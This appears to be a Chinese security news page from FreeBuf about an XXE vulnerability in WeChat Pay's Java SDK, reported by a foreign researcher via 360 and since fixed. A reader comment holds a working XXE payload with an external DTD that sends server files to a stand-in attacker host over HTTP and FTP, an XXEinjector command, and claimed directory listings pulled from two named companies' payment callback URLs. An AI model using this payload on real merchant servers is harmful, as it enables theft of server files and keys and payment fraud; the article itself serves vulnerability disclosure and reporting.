快讯 | 发现微信支付的重大漏洞,国外白帽子竟然先联系了360?

2018-07-03 429382人围观 ,发现 10 个不明物体 资讯

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

随着微信支付逐渐向海外市场普及,越来越多的外国友人及店铺开始使用微信支付。不过却发生了一件有趣的事情,国外一名白帽子发现了微信支付的漏洞,但却不知道如何联系微信安全的人员,竟然在Twitter上@360NetLab。在360安全人员转达漏洞之后,微信安全团队已经及时跟进处理这个问题。目测,下一波“微信致谢360”不远了……

TIM截图20180703111929.png根据白帽子给出的漏洞描述,使用微信支付时,商家需要提供通知网址以接受异步支付结果。 问题是微信在JAVA版本SDK中的实现存在一个xxe漏洞。 攻击者可以向通知URL构建恶意payload,根据需要窃取商家服务器的任何信息。 一旦攻击者获得商家的关键安全密钥(md5-key和merchant-Id等),就可以通过发送伪造信息来欺骗商家购买任何东西而无需付费。

微信可以通过更新sdk修复问题,但是商家修复漏洞则需要时间和经验。

TIM截图20180703113941.png也许是360安全团队在国外更加知名,发现微信支付漏洞之后,该白帽子却不知如何联系微信安全团队,无奈只能在Twitter上@360NetLab。360的安全人员也在得知消息之后告知微信团队,很快我们也在白帽Twitter 的推文下看到了微信安全团队的回复,表示“已经在紧急跟进这个问题”。

有关漏洞详情及演示过程,可点击链接查看:http://seclists.org/fulldisclosure/2018/Jul/3

*本文作者:Andy.i,转载请注明来自FreeBuf.COM

相关推荐

这些评论亮了

  • flagellantX (4级) 在路上点滴挪步,不骄不躁,极度讨厌恃强凌弱欺负菜鸟的人格障碍... 回复
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE root [
    <!ENTITY % attack SYSTEM "file:///etc/">
    <!ENTITY % xxe SYSTEM "http://attacker:8080/shell/data.dtd">
    %xxe;
    ]>

    data.dtd:

    <!ENTITY % shell "<!ENTITY % upload SYSTEM 'ftp://attack:33/%attack;
    '>">
    %shell;
    %upload;

    or use XXEinjector tool ahttps://github.com/enjoiz/XXEinjectora

    ruby XXEinjector.rb --host=attacker --path=/etc --file=req.txt --ssl

    req.txt :
    POST merchant_notification_url HTTP/1.1
    Host: merchant_notification_url_host
    User-Agent: curl/7.43.0
    Accept: */*
    Content-Length: 57
    Content-Type: application/x-www-form-urlencoded

    XXEINJECT


    In order to prove this, I got 2 chinese famous company:
    aamomo: Well-known chat tools like WeChat
    bavivo i1/4China's famous mobile phone,that also famous in my country

    Example momo :
    attack:
    notify url: https://pay.immomo.com/weixin/notify
    cmd: /home/

    result:

    ***
    logs
    zhang.jiax**
    zhang.shaol**
    zhang.xia**
    ****

    attack:
    notify url: https://pay.immomo.com/weixin/notify
    cmd: /home/logs

    result:
    ***
    moa-service
    momotrace
    ****

    Example vivo :
    attack:
    notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
    cmd: /home/

    result:
    tomcat

    attack:
    notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
    cmd: /home/tomcat
    result:
    .bash_logout
    .bash_profile
    .bashrc
    logs

    attack:
    notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
    cmd: /home/tomcat/logs
    result:
    ****
    tomcat-2018-06-28.log
    tomcat-2018-06-29.log
    tomcat-2018-06-30.log
    )36( 亮了
  • heiheihaha 回复
    外国友人。。。用中文标点的外国友人?
    )12( 亮了
发表评论

已有 10 条评论

取消
Loading...
shidongqi

曾梦想仗剑走天涯,看一看世界的繁华。

399 文章数 190 评论数 15 关注者

文章目录

    特别推荐

    推荐关注

    官方公众号

    聚焦企业安全

    填写个人信息

    姓名
    电话
    邮箱
    公司
    行业
    职位
    css.php